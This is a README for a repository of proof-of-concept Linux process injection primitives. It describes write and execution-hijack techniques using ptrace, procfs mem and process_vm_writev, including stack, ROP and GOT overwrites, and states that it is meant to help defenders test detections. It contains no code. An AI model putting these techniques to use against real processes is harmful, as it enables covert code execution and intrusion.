Linux Process Injection: proof-of-concept implementations of various Linux process injection primitives

Linux Process Injection

This repository contains proof-of-concept implementations of various Linux process injection primitives.

This code is meant to provide simple examples of injection techniques in action, allowing defenders to understand how they work and to test detections. For the sake of simplicity and to keep the code as benign as possible, the implemented techniques don’t handle process recovery – meaning that the target process will likely crash after the injected payload finishes.

Linux Process Injection

The primitives are implemented using 3 methods: ptraceprocfs mem, and process_vm_writev. For each of them, 2 types of primitives were implemented:

  • Write primitives: intended to write the code into the remote process
  • Execution primitives: intended to transfer execution to the injected code

These primitives can be combined freely to create “custom” injection variations.

The following primitives are implemented:

ptrace

 

  • ptrace_poketext_write

Write code into a remote process by using the ptrace POKETEXT request.

  • ptrace_setregs_exec

Hijack the execution flow of a remote process by using the ptrace SETREGS request to modify the process RIP register.

  • ptrace_pokeuser_exec

Hijack the execution flow of a remote process by using the ptrace POKEUSER request to modify the process RIP register by accessing the process user area.

procfs mem

 

  • procfs_proc_mem_write

Write code into a remote process by editing its procfs mem file.

  • procfs_proc_mem_exec

Hijack the execution flow of a remote process by editing its procfs mem file. This is implemented by:

  1. Identifying the address currently inside RIP
  2. Inject a small stub to that address that performs a JMP to the address of our payload. Alternatively, it is possible to use the procfs_proc_mem_write function to directly write our code to the address of RIP.

process_vm_writev

 

  • process_vm_writev_write

Write code into a remote process by using the process_vm_writev syscall. This requires writing to a writable memory region.

  • process_vm_writev_stack_overwrite_exec

Hijack the execution flow of a remote process by overwriting a return address on its stack.

  • process_vm_writev_stack_overwrite_rop

Execute code in the remote process by overwriting its stack with a ROP chain. This method relies on hardcoded addresses of gadgets, please modify them to make it work on your machine.

  • process_vm_writev_got_overwrite_exec

Hijack the execution flow of a remote process by overwriting function pointers inside its GOT. This implementation is crude, and will simply overwrite the first 100 pointers. To make this method more reliable, it is required to parse the GOT and target specific functions.

For additional information on the different techniques, please refer to this blog.

Download & Use